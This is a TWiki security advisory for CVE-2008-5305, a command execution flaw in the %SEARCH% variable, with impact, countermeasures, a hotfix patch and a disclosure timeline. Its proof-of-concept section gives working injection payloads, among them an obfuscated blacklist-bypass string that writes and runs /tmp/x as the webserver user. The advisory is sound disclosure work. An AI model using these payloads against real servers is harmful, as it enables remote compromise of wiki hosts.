Tags:
create new tag
view all tags



ALERT! NOTE: The security alert sent out on 2009-04-29 contained an incorrect link to this old CVE. Please visit SecurityAlert-CVE-2009-1339 to see info and give feedback on CVE-2009-1339 - CSRF Vulnerability with Image Tag.




Security Alert: TWiki SEARCH variable allows arbitrary shell command execution

ALERT! Get Alerted: To get immediate alerts of high priority security issues, please join the low-volume twiki-announce list - details at TWikiAnnounceMailingList

This advisory alerts you of a potential security issue with your TWiki installation: The %SEARCH{}% TWiki variable allows arbitrary shell command execution. (See also unrelated SecurityAlert-CVE-2008-5304 - Cross-site scripting vulnerability with TWiki URLPARAM variable.)

Vulnerable Software Version

Attack Vectors

Editing wiki pages and HTTP GET requests towards the wiki server (typically port 80/TCP). Typically, prior authentication is necessary (including anonymous TWikiGuest accounts).

Impact

An unauthenticated remote attacker can execute arbitrary shell and/or perl commands as the webserver user, such as user nobody.

Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:

  • Severity 1 issue: The web server can be compromised

MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2008-5305 to this vulnerability.

Details

The %SEARCH{}% TWiki variable or a specially crafted GET URL enables a malicious user to compose a command line executed by the Perl backtick (``) operator. User input is passed to the perl "eval" command without first being sanitized.

If access to TWiki is not restricted by other means, attackers can use the SEARCH variable with or without prior authentication, depending on the configuration.

Proof of concept:

  • Enter the following in the search box:
    %SEARCH{ date="P`pr -?`" search="xyzzy" }%

  • Or use a GET URL like:
    http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

Afterwards, evidence of command execution can be seen in the webserver's error_log:

[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] pr: invalid option -- ?
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] Try `pr --help' for more information.
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] [Thu Sep 11 22:13:36 2008] view: Use of uninitialized value in concatenation (.) or string at /var/www/twiki/lib/TWiki/Time.pm line 441.

Arbitrary code execution is tedious due to the following:

  • forward slash not allowed
  • upper and lowercase y,m,w,d,h,s characters are not allowed
  • backslashes are escaped ('\' -> '\\')

An attacker may be able to circumvent this blacklist by uploading a file to a directory listed in $PATH and then executing it similar to the "pr" example above.

An attacker could also determine a transform that would bypass the disallowed characters. A combination of perl variables and shell globbing functionality can be used to overcome the blacklist. The following example uses perl's tr command to generate the blocked characters. Once a set of perl variables exists, they are used to generate shell commands that are written to "/tmp/x" which is then executed (its output is redirected to stderr so that it appears in the error_log).

# A = m, B = y, C = s, E = d, F = h, G = w, X = /
%SEARCH{date="Pour $X='X';$X=~tr#X#\057#;our $A='X';$A=~tr#X#\155#;our %$B='X';$B=~tr#X#\171#;our $C='X';$C=~tr#X#\163#;our %$E='X';$E=~tr#X#\144#;our $F='X';$F=~tr#X#\150#;our %$G='X';$G=~tr#X#\167#;`ec${F}o ${X}u${C}r${X}bin${X}i${E} > %${X}t${A}p${X}x;c${F}${A}o${E} +x ${X}t${A}p${X}x;${X}t${A}p${X}x %>&2;`" search="xyzzy"}%}

Here's the output in the error_log:

[Fri Sep 12 01:13:21 2008] [error] [client 127.0.0.1] uid=81(apache) gid=81(apache) groups=81(apache)

Countermeasures

  • Apply hotfix (see patch below).
  • Upgrade to the latest patched production TWiki-4.2.4, TWikiRelease04x02x04.
  • Use the web server software to restrict access to the web pages served by TWiki.
  • The {SafeEnvPath} configure setting can be used to restrict the possible directories that are searched for executables. By default, this is the PATH used by the webserver user. Set {SafeEnvPath} to a list of non-writable directories, such as "/bin:/usr/bin".

Authors and Credits

Hotfix for TWiki Production Release 4.2.x

Affected file: twiki/lib/TWiki/Time.pm

Patch:

--- twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
+++ twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
@@ -431,13 +431,16 @@
        $ends[$i] =~ s/S/\*1\+/gi;
        #   possibly append '0' and evaluate numerically the string.  
        $ends[$i] =~ s/\+$/+0/;
-        my $duration = eval($ends[$i]);
+        $ends[$i] =~ s#[^-\d+*/]##g;
+        my $duration = eval( $ends[$i] );
        #   the value computed, if it specifies the starting point
        #   in time, must be subtracted from the previously
        #   computed ending point.  if it specifies the ending
        #   point, it must be added to the previously computed
        #   starting point.
-        $ends[$i] = eval($ends[1-$i].$oper[$i].$ends[$i]);
+        my $expr = "$ends[1-$i]$oper[$i]($ends[$i])";
+        $expr =~ s#[^-\d+*/()]##g;
+        $ends[$i] = eval( $expr );
        # SMELL: if the user specified both start and end as a
        # time duration, some kind of error must be reported.
    }

Hotfix for older affected TWiki Releases

Apply above patch (line numbers may vary).

Action Plan with Timeline

# Action Date/ Deadline Status Who
1. User discloses issue to TWikiSecurityMailingList 2008-11-21 Done Peter Allor
2. Developer verifies issue 2008-12-01 Done Crawford Currie
3. Developer fixes code 2008-12-01 to 03 Done Crawford Currie, Sopan Shewale
4. Security team creates advisory with hotfix 2008-12-03 Done Troy Bollinger, Peter Thoeny
5. Send alert to TWikiAnnounceMailingList and TWikiDevMailingList 2008-12-03 Done Peter Thoeny
6. Publish advisory in Codev web and update all related topics 2008-12-05 Done Peter Thoeny
7. Issue a public security advisory (vuln@secunia.com, cert@cert.org, bugs@securitytracker.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org) 2008-12-05 Done Peter Thoeny

External Links

-- PeterThoeny - 03 Dec 2008

Discussions

Edit | Attach | Watch | Print version | History: r10 < r9 < r8 < r7 < r6 | Backlinks | Raw View | Raw edit | More topic actions
Topic revision: r10 - 2009-04-30 - PeterThoeny
 
  • Learn about TWiki  
  • Download TWiki
This site is powered by the TWiki collaboration platform Powered by Perl Hosted by OICcam.com Ideas, requests, problems regarding TWiki? Send feedback. Ask community in the support forum.
Copyright © 1999-2024 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.